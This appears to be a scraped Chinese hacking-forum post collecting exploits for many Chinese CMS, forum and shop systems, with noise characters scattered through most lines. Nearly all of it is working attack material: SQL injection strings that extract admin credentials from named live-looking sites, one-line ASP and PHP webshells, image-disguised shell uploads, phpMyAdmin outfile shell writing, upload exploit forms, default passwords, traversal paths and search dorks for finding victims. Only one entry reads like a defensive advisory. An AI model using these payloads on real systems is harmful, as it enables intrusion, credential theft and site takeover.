启航企业建站系统 cookie注入漏洞通杀所有版本
8 b2 m2 @! ~+ W3 {' {. J I6 b' }, }+ T9 c! F; P
直接上exploit:
! i# S: h) ?4 e- S {% djavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
/ Z' t: @# W% _: wtest:http://www.tb11.net/system/xitong/shownews.asp?id=210
+ K3 I" h5 t7 i6 ], N) V6 K6 E--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* j* `, a" d; rAsprain论坛 注册用户 上传图片就可拿到webshell
# M. v$ S8 G6 y* I8 a( C% K
k# l, Z5 W, F1 n% TAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。" H- P! @0 S0 Z9 K
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
) E( _# Q# Q# H+ p! [) R2.gif 为一小图片文件,一定要小,比如qq表情图片5 B5 n" |( C: `
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用3 b! I3 v( l, f
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
" \1 m5 N2 S5 T O5.q.asp;.gif
; o# a! @( d" L$ M/ |google:Powered by Asprain
/ T0 Y$ B* h' ^" D--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ a/ Y0 R0 }! s9 k
5 l: a, l- p. j! X0 FShopNum1全部系统存在上传漏洞。2 ?/ B% |4 _" O2 _: Y
3 z2 ?8 E) E" d X9 }1 ~. U0 V首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
9 ?: u* Q" M9 e3 b3 W4 i按说明 提示登录后台。。( W3 [( s/ e7 m* U2 ?* i9 Y
在后台功能页面->附件管理->附件列表
4 X8 @- P/ F3 r8 |可以直接上传.aspx 后缀木马
+ w6 A% f4 q, n" o2 h, ghttp://demo.shopnum1.com/upload/20110720083822500.aspx0 W5 h7 ]$ `2 M6 X/ L) o8 i; z
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------' m0 ~3 e2 g1 R. z$ N: P6 f/ z
% q* {/ I) S$ U; b8 K+ g9 @/ }; C牛牛CMS中小企业网站管理系统 上传漏洞% h9 {. r0 ?$ K- e0 v! @
9 m' ~* b* w+ |: I9 d4 c7 D9 J" F牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
% n; U) Q9 e7 B G5 ~' H后台:admin/login.asp. ]3 V- L3 y+ g8 O, m2 Q( ?8 f6 w
ewebeditor 5.5 Nday
9 s$ ^9 P5 W2 ]7 l1 a" Nexp:* I2 j" W7 @7 s% W. t+ r
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
3 _1 ~- ]. d) U: \$ o* |+ v<input?type=file?name=uploadfile?size=100><br><br>?
' q6 }2 n0 L" P z+ I+ J; e<input?type=submit?value=upload>?
0 `! X8 `. y9 d5 S+ s</form>
: e, N: l# Z5 g* f' L6 r' d4 xps:先上传小马.( }+ I* x1 v6 I2 B
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏2 I! T( X: }. t9 I
1 Z, ?! B' z% |, @
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 F @) {, n6 S
6 J8 h1 J$ }( H$ N- J O' XYothCMS 遍历目录漏洞
% f- |/ L9 C: g7 e
% j' r# w8 M. R& U9 ^9 ]6 T+ T优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。4 _* j8 ?" [6 _ ~# D
默认后台:admin/login.asp
/ U- o6 w4 J0 w$ R$ J遍历目录:2 v N) S$ w$ y
ewebeditor/manage/upload.asp?id=1&dir=../7 }" ~4 K: s, ?/ z9 p
data:) e8 o6 |$ v( L) U& H3 z
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
% ]# T4 v- n* s8 Q9 K--------------------------------------------------------------------------------------------------------------------------------------------------------------------------; q0 Q0 {$ G) | P: m
6 c5 Y& u$ u! I7 g
Net112企业建站系统 1.03 G0 P) ~; v9 B/ C
; v z/ m/ |2 f5 n/ {! d源码简介:6 X9 F0 f, ^7 |4 Z7 M- F
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
( L r' E9 V" ?2 I添加管理员:
! c! Z# O* ~, K B, Fhttp://www.0855.tv/admin/admin.asp?action=add&level=2
4 j- Y2 v3 `3 J其实加不加都不是很重要,后台文件都没怎么作验证。# `+ x! ?2 m, @, P& W. @
上传路径:' I- G9 f7 k* G
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
: N& o+ x3 i" |: c, Bhttp://www.0855.tv/inc/Upfile.asp?Stype=23 p3 z0 C7 H- z
怎么利用自己研究。& q% } D9 G* m9 Z; P
遍历目录:
. {8 R1 X i& T9 f* f: thttp://www.0855.tv/admin/upfile.asp?path=../..- F6 F1 e# V5 e) q2 t Y* e" N- S0 s4 |
如:, c# Q/ Y" L5 e h
http://www.0855.tv/admin/upfile.asp?path=../admin
; o" \% m5 {1 G2 n& O. thttp://www.0855.tv/admin/upfile.asp?path=../data2 W# [" P" h$ g4 a2 @
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------. f0 I$ i- p/ L$ F4 C1 t. I, z+ w
/ s; W; m! [/ d4 w9 S易和阳光购物商城通杀 上传漏洞8 d0 d7 O, r5 z, n' @
+ y( Z& r, U6 T4 |; ^* [4 `" |4 K" [前提要求是IIS6.0+asp坏境。
7 P _* I4 ]* E; g! E$ B7 h漏洞文件Iheeo_upfile.asp
( ?6 B$ l- a: ?4 i2 C& F过滤不严.直接可以iis6.0上传
; G* _' u; h: z- e. W$ I2 N把ASP木马改成0855.asp;1.gif, o2 z$ V2 [+ k' F
直接放到明小子上传( v' h! T( q, K3 w
Google搜索:inurl:product.asp?Iheeoid=
( ~& r H2 ^1 i--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 U4 ?( k' g, o) l% }% q6 W& e) W! d7 _1 [' j7 X
phpmyadmin后台4种拿shell方法; @: h6 F! x' G) p+ A
: E: q( Y. }$ u% }& _
方法一:
1 ?4 E5 m& v! sCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
4 ?3 Q! _( c1 eINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
$ d B6 e0 Z0 @' ?7 y4 J- ~ HSELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';9 Z: |' g K5 v) Q) ^1 Z
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php7 z! J5 h. w7 N7 Y" c
一句话连接密码:xiaoma( D2 B, ~7 W; t+ K; @- e! t9 v$ A
方法二:
9 V7 n7 e1 V1 ACreate TABLE xiaoma (xiaoma1 text NOT NULL);
( t& {; a/ y4 _* tInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');) Y k' Q( V$ n# A
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
" S0 _& R3 y6 i7 YDrop TABLE IF EXISTS xiaoma; F! r) A8 I) M1 l' x
方法三:
& n$ r) s9 h. \: b读取文件内容: select load_file('E:/xamp/www/s.php');% Z1 U6 H% _. B ?, r
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
" G, B& Z8 x6 z+ h" e' Mcmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
- w+ d9 a# h7 }; I, h8 K0 d1 n+ o方法四:
; V$ N9 m! L4 }; n! @% J- J- xselect load_file('E:/xamp/www/xiaoma.php');
" I, |0 Y* G M: W/ n% gselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
+ O: S1 W; Q7 k% w; I* Y' K3 d+ w8 C然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
" k3 [6 [+ j/ a' m--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% F* {: j4 t9 \7 j- Z
' d! Y0 g3 y0 J% y3 ~传信网络独立开发网站源码0day漏洞) b5 P; @) L! f' m1 ?% r
# y( V }4 }0 e e8 q: ]4 ^
后台system/login.asp
/ n4 s: Q) ^- p进了后台有个ewebeditor* d# p3 A- C# A+ R- k
Google 搜索inurl:product1.asp?tyc=1 l' J0 t% u9 @3 s$ z4 \ U( N
编辑器漏洞默认后台ubbcode/admin_login.asp: `; l" i+ R; ]
数据库ubbcode/db/ewebeditor.mdb
1 p' t6 T4 w6 Z0 F3 ~9 d默认账号密码yzm 111111 P0 e6 U+ [; H2 q
& {: [) Q( {3 j# g- B
拿webshell方法
+ s# H+ m+ u- ]6 ^登陆后台点击“样式管理”-选择新增样式 1 A# k, ]9 d3 h
样式名称:scriptkiddies 随便写 ' l5 r, W. V) }% y, {; c5 S* N
路径模式:选择绝对路径 : v) _" n+ t9 Z F. t4 D2 X2 Z
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
, G7 Q, V% @: s% \3 Y& [图片类型比如就是我们要上传的ASP木马格式
( U/ t3 f! c% o上传路径:/) ]9 k9 ~# g' c7 ?
图片限制:写上1000 免的上不了我们的asp木马
% e6 d* e3 n% K# j上传内容不要写, y+ r, u$ ?, Q( z0 B
可以提交了 ! v" b. H1 O5 G3 [
样式增加成功!
$ Q; \5 K5 ]2 O' \# R! _8 |返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
% N# R: A0 {% G2 t按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
* i) k% d- s0 K: P( W网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies& V& C; a% n- J5 p
上ASP木马 回车 等到路径( B* c' E @& h6 ~+ a( x5 C' A
) ]6 \6 x7 K+ F% x7 v2 d
后台:system/login.asp
, {2 O$ F- ~" ]Exp:
# K+ Q9 ^* R8 V, @7 Z& k/ T+ r4 u; Vand 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
& x6 n9 I2 C% j4 r% y& C测试:; e; ~, U6 [' S1 [- [4 s; q" q
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
# W* M2 `! |- x2 o9 |( |http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master9 ]* L8 k. Z1 V- u0 h4 H( ^
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 g5 ]8 E o. F8 y3 I ~1 i. w4 ~: V5 a- S9 [8 \2 I2 k
foosun 0day 最新注入漏洞* H6 Z$ f. M; q; w. ?' A' r3 J
3 ]2 z6 q1 n! I( f( |" M. W3 l/ G1 W
漏洞文件:www.xxx.com/user/SetNextOptions.asp, R: ]4 R, {: Q' j- T2 n
利用简单的方法:
7 U4 ~/ `# j8 o' V7 O3 o* R暴管理员帐号:2 R8 v' M) A3 z9 e- p2 z8 E* H* p
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
/ \+ I: T* z s+ K8 v暴管理员密码:. u g7 \3 j5 z/ [2 Y7 }
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,8 _2 B1 ~& Q1 Y) E
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------% F7 ?- b1 R: y: }5 g# @0 r2 Q
" o+ ^ h3 \$ Y# S" N/ U! A网站程序的版权未知!, P4 L! K6 J3 P# K2 v1 u! H
+ {! r1 q, l* ]& d
默认网站数据库:. H. }% F0 i$ a' d8 q. m5 \, `: t
www.i0day.com/data/nxnews.mdb
5 h# s. N2 y( Q' I( I2 \ewebeditor 在线编辑器:
w. {6 G ^; I& a编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb# @# \2 a$ i0 y/ k# L3 h# C
登录地址:ewebeditor/admin_login.asp
" U6 W; [+ F5 ` D) g" q默认密码:admin admin' P4 r$ V3 ?) F
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
/ Z+ v$ E0 a) T. }
5 h" ?! y# a' y" A" v8 G$ HSql注入漏洞:9 y" B- ?$ R8 ?: ?6 C
http://www.i0day.com/detail.asp?id=127 e* a+ |. }/ {; ` d: N0 s4 J
exp:
6 k2 e; f" b0 ?6 n9 `% Aunion select 1,admin,password,4,5,6,7,8 from admin5 j( F% [* r& r7 ~& U
爆出明文帐号/密码
4 v- ~7 a3 L: c. h+ l1 r6 K3 _. u4 F5 Y3 A( S) Z4 i
上传漏洞:
6 c0 o) z: X4 R; `, w3 ~$ ~后台+upfile.asp% S2 U+ T3 {5 w/ @, I
如:5 |9 y7 K& J8 `' ?0 t2 X) y# A
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
3 W6 ~7 \6 G4 L# K! }* L7 B! l3 ? ~shell的地址:网址+后台+成功上传的马- |5 x: {( j2 B( C) z* F
google:inurl:news.asp?lanmuName=" G8 z1 G3 O/ f' A( R
------------------------------------------------------------------------------------------------------------------------------------------------------------------------# K0 v4 c0 E: O4 Z5 q' W1 h; f+ ]6 i
/ g" S8 J( J$ c! F) S4 |" P1 |2 |dedecms最新0day利用不进后台直接拿WEBSHELL
7 i5 Q" D4 T+ l2 m$ G2 Q
. `8 L8 a( j, ^% Z$ W拿webshell的方法如下:
) P4 A: C6 p; F网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
& w( X; W2 {/ Z前题条件,必须准备好自己的dede数据库,然后插入数据:
. F( K8 u6 e. minsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); ! _3 a$ @5 ?' e# I, ^+ ^. X
4 h2 K; i0 `4 d, n" W8 t" j. i( p再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
- _! j: Y& o$ `6 p1 L<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">- P$ R) E6 ^0 o w- i' a
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
8 Y8 b+ u% c" N$ @& g3 Y/ S<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />9 b0 J. c0 u8 Q6 W0 `) z% a* j
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
* M! B% [* N/ }! |<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
: u8 X3 S2 r6 B9 X$ r; L<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />% K* I( C [/ e7 I5 j
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
2 N' T1 K9 u8 z$ v, U6 `<input type="text" value="true" name="nocache" style="width:400">
& p! @; ?$ {# U& p<input type="submit" value="提交" name="QuickSearchBtn"><br /># k$ j( Z" H" H
</form>
$ s J# k }3 q+ c<script>0 M" D9 W8 x6 z9 A: I
function addaction()/ [( O3 ]$ q% J- c+ C
{
" |4 g0 S* [& y$ ~6 L% u2 d- cdocument.QuickSearch.action=document.QuickSearch.doaction.value;
( ]9 y; n# D3 |! A6 c# J}
+ D1 Z. _" [( K d</script>
; X/ W/ k5 y* P" X$ Q3 ~8 l g6 ?$ w-----------------------------------------------------------------------------------------------------------------------------------------------
6 y3 g9 Y4 O. H& R6 f( S& s4 B( S! }2 V4 T) `0 [8 U# |
dedecms织梦暴最新严重0day漏洞
( J5 L. i# i( o+ h# e) Hbug被利用步骤如下:
- r5 t; [8 P: A. [) Q' chttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
8 P) m8 H3 o: l/ x. J把上面{}上的字母改为当前的验证码,即可直接进入网站后台。: p- `5 s# \+ ?9 b, Z+ Z
-------------------------------------------------------------------------------------------------------------------------------------------
* i, H# i$ W2 J1 X+ T& n. H: X3 j% [; n1 [$ z6 o& d9 ^
多多淘宝客程序上传漏洞
# U3 A6 ?+ R% V. g漏洞页面:7 U& Y( q6 L7 [
admin\upload_pic.php
, f. V1 E9 U% n$ s. ]1 S- p传送门:% m/ N, R. ]5 V2 N
http://www.www.com/admin/upload_pic.php?uploadtext=slide1* x/ j- a: a/ I, V
PS:copy张图片马 直接 xxx.php 上传抓包地址!
- M0 f5 ]/ F2 L% G( _------------------------------------------------------------------------------------------------------------------------------------------------------
7 m2 b3 p4 ^- |4 s( B" C& d8 D- V6 w0 Z
无忧公司系统ASP专业版后台上传漏洞
$ K2 o) F; ]1 g' j漏洞文件 后台上传
) y0 O6 G/ D# N, Y! aadmin/uploadPic.asp
% B! v4 H% A6 Y9 s6 H O漏洞利用 这个漏洞好像是雷池的) u. @6 X8 z. G2 [# o: b% B- Z* R
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1: R% B) R) y5 _- P* g7 W
等到的webshell路径:
i- R7 Z: d8 n5 W# m/UploadFiles/scriptkiddies.asp;_2.gif7 b0 i+ ?; A6 h
---------------------------------------------------------------------------------------------------------------------------------------------------
* l3 B7 ~* m' x4 T* X
! {8 p: h* i8 r住哪酒店分销联盟系统2010
) l2 c7 _2 c+ `1 K# f: x) N2 Z; KSearch:
& O2 V$ ~9 c( H K2 ]inurl:index.php?m=hotelinfo
- h W4 r8 K" Y8 P8 d" z; ihttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
5 p1 C0 ^0 `0 Y/ C2 p5 @/ F默认后台:index.php?m=admin/login0 t9 H7 A2 k3 h) U. g8 ?/ x
--------------------------------------------------------------------------------------------------------------------------------------------------# D8 e- x) K+ t) T
. Z9 m& \# u! G! |, uinurl:info_Print.asp?ArticleID=1 o& v: o) Q- M
后台 ad_login.asp* f5 K; w' R% `& I- k- q0 W# V
爆管理员密码:- @* r7 z1 ^3 Y& d
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin; }1 ?6 Z! ]: |- m
------------------------------------------------------------------------------------------------------------------------------------------------------------
' D" A/ y& N; @+ m5 H0 A" Z8 P0 i6 b2 |+ q% J" N, D
搜索框漏洞!$ f$ a1 @$ |8 ?2 G& N* T1 f2 t
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='0 b9 c" o! M* V& y6 h
--------------------------------------------------------------------------------------------------------------------------------------------------------
0 F: g/ h4 U. F
' `8 V% i8 A M X& Z9 `; t( i4 k关键字:. e. x: s7 k; f9 t
inurl:/reg_TemletSel.asp?step=2
a- z6 O: d" n! E- @或者
* `: U$ d% s7 J7 r! j/ x电子商务自助建站--您理想的助手+ b: i: W0 Q. \* P
-------------------------------------------------------------------------------------------------------------------------------------------------+ |2 X0 t; q. e. G
! I# W# m* c9 _7 ], Q$ k7 ]: J
iGiveTest 2.1.0注入漏洞
+ |; y' r8 I- h7 A- ^& _Version: <= 2.1.05 {2 i% x5 s, b4 ]& q
# Homepage: http://iGiveTest.com/, g, r6 g8 ]8 A' S
谷歌关键字: “Powered by iGiveTest”: j- r# q1 A6 |5 e y
随便注册一个帐号。然后暴管理员帐号和密码
4 i ?4 T" [) Shttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (12 Q: v6 R2 j1 Z/ V( }2 k
------------------------------------------------------------------------------------------------------------------------------------------------
9 B4 h& _8 r, }1 K: N- N: G% n" z* V4 W2 P
CKXP网上书店注入漏洞2 n. A3 p# h, S) ]
工具加表:shop_admin 加字段:admin) B6 j- t2 X7 W" S% B# f
后台:admin/login.asp
7 ^- ]0 f/ W) E8 P, ]! X登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
7 z& m7 O$ s, z T$ J m4 ainurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息1 `- a$ _: `5 x9 j0 ^
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 `; t# L0 c! [% Y7 g& d. W- J+ x& O# B# e
段富超个人网站系统留言本写马漏洞7 t) M5 s4 V7 k$ i
源码下载:http://www.mycodes.net/24/2149.htm
; d1 N f$ a4 Z+ I( b9 Q* qaddgbook.asp 提交一句话。
3 b9 Y; ]* E; B* q1 P连接: http://www.xxxx.tv/date/date3f.asp
. y; j9 \2 k# T7 fgoogle:为防批量,特略!
0 G( q0 f. Z, ~8 H-------------------------------------------------------------------------------------------------------------------------------------------------------------------------, L6 `. I L, R# V, l# t) A
# ~. ^5 E% c" Q X/ I
智有道专业旅游系统v1.0 注入及列目录漏洞
, X9 `5 X% d, ~6 h d# N默认后台路径:/admin/login.asp. g8 k+ D- K7 A) Z& o. r' l
默认管理员:admin7 q3 Q: f% Z/ B; e# I7 O, {
默认密码:123456
* G( b% |8 [5 _$ QSQL EXP Tset:, [# W0 \. I3 u& K5 I/ h
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin& X2 Y$ M5 Q2 D
------------------------------------------------------------------------------------------------------------------------------------------------------------------------# Y6 y- C( T( i4 Y8 H# K9 `. D! C
- w5 `6 b5 H8 s5 N4 p2 w
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
8 i1 }$ U6 R9 N3 V' Q; K& a5 x5 H2 eEXP:
0 w7 d0 R9 b6 B- c<title>eWebeditoR3.8 for php任意文件上EXP</title>: d; V2 {/ K5 B6 G
<form action="" method=post enctype="multip
* `- ]( q5 M* h2 E* ]3 Aart/form-data"> 0 J1 u* a5 j9 n2 n1 y, m
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
3 Z% N& t1 H5 z0 f" ]URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br> 1 {+ X* P3 o1 R9 d
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
2 P# Y2 n9 L" s/ O, w5 A3 Bfile:<input type=file name="uploadfile"><br>
* J T# ?- [- p5 v, D* J<input type=button value=submit onclick=fsubmit()> ; Y: U2 X$ ~% m A2 u6 [
</form><br>
! L2 O# N# Y. r5 F<script> " [; v0 J4 ?" K
function fsubmit(){ # o) O1 y: [7 |3 H4 g' i
form = document.forms[0];
8 W& H9 K; t0 @& tform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; 3 U8 b8 n' j9 d+ g9 r! o
alert(form.action); * s3 N t/ g5 ]1 u
form.submit(); 6 T3 Z" A3 }8 y t) g! x7 a
}
6 C2 G% i% F& v% M( H0 V$ U# L</script>
# b" J/ M5 u% H* o, H9 w注意修改里面ewebeditor的名称还有路径。1 Z6 }1 I: K& ?7 z' P
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 W* D3 P5 n- C* t
6 u! Y0 k/ G% ?! H. p& f/ Y# [5 y
提交’时提示ip被记录 防注入系统的利用+ p- f* t% Q8 b( p& d% J6 ] _0 }
网址:http://www.xxx.com/newslist.asp?id=122′# v7 _3 }% f$ ?4 h
提示“你的操作已被记录!”等信息。
. J5 d# I v: M4 L4 S8 V4 B1 x4 y利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
) P* S7 O Y( o0 Y+ B9 z-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. @$ m4 \! h; R. v
/ q2 I1 |8 w. ` M西部商务网站管理系统 批量拿shell-0day/ K" |0 y6 {- T- i& O) e, Z
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb & t0 B" a* {5 ]" L
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛: E- }! k! M2 {6 V, R
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合; P- P/ Q' n0 `1 x- {; t
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂% x; S( h7 p9 ?
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- l) }5 K: x" E4 Q/ N
% k1 Z. `5 H' W, x- }JspRun!6.0 论坛管理后台注入漏洞
* r) L/ n0 w0 b( j. G- R7 |+ b
# h' R6 c# _4 V0 t6 x) Y' d( vSEBUG-ID:20787 发布时间:2011-04-30 影响版本:6 E% R: B3 |! A
JspRun!6.0 4 M5 w) B5 M {/ H' x$ T
漏洞描述:: ~9 ~% m) |/ n4 t! I
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。% o. b! Q! v8 l( [9 W
在处理后台提交的文件中ForumManageAction.java第1940行" l5 U- [0 ^/ ]: ^
String export = request.getParameter("export");//直接获取,没有安全过滤
% \+ d/ {; ?0 x! \- rif(export!=null){
1 H6 B% O8 t. Q6 cList> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
, s; k5 R+ H Q) [2 m" Pif(styles==null||styles.size()==0){
B( \& s1 J6 W0 ^<*参考
! o! ~: R( q' q9 j! Tnuanfan@gmail.com
# r; ~( D5 `- W1 C" B6 A- e) t*> SEBUG安全建议:8 w9 Q# V0 ?4 o) u$ H
www.jsprun.net
$ V* y& {) v4 q4 `! R/ z+ X(1)安全过滤变量export
; X& @8 a/ u# n% s K( E(2)在查询语句中使用占位符
$ ~' Y7 X% v# P------------------------------------------------------------------------------------------------------------------------------------------------------------------------------& |8 F) R. @+ F! Q7 @
) V2 F9 Y# g/ }3 Y: b
乌邦图企业网站系统 cookies 注入
' I) R! }* F& ~! T3 [% c' n
& @* o9 q/ M; i$ O程序完整登陆后台:/admin/login.asp3 ~( H# j+ l c( m: r1 B6 u* U
默认登陆帐号:admin 密码:admin888
$ ^8 \: b7 J6 J, a1 C0 ]6 V语句:(前面加个空格)
c7 U5 R0 A v$ m0 v7 X; tand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
N& @8 D6 r: t% M. ~或者是16个字段:( m. _, p. t# l! q1 k
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
! [- c4 y6 V" F& E+ Z1 W0 r爆不出来自己猜字段。5 h6 S+ I# d, J. P) l u7 N
注入点:http://www.untnt.com/shownews.asp?=88
9 U; r8 I3 r) H. V, qgetshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
! J- a, a+ H+ o. x |- f0 a关键字:1 |: P& x4 p! E8 Q
inurl:shownews?asp.id=
2 E4 f' I& A3 T# P) z- ]-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" z" c5 D% G! A6 m7 G
' N( p/ F3 Q) p, }$ e/ p7 q" A9 z; pCKXP网上书店注入漏洞
S6 J7 O$ P F4 z8 Q8 g9 D3 _5 J
4 A p: q2 R' b) w) f+ x& h3 C0 l2 B' Z工具加表:shop_admin 加字段:admin) [0 P0 @: [ f
后台:admin/login.asp . N* t! B6 I4 \7 U) b9 M
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/, N! d3 w+ E/ M. _4 _. ]8 [7 n! U
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息+ z7 w8 Q( z% w8 q" t
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------; u V4 { X# D; t5 c" L U Q
+ F7 d& C' W( X; O7 u1 [4 QYxShop易想购物商城4.7.1版本任意文件上传漏洞
. ?/ I# [& R+ w/ ?4 b0 w' U9 K) C! S
( D6 g& S5 @9 Z9 S4 t0 ^- `0 [) whttp://xxoo.com/controls/fckedit ... aspx/connector.aspx
% ~" a4 W0 d. S7 W& X, C" {跳转到网站根目录上传任意文件。6 p- S. Y# c* _5 {7 g' Q7 V" z
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
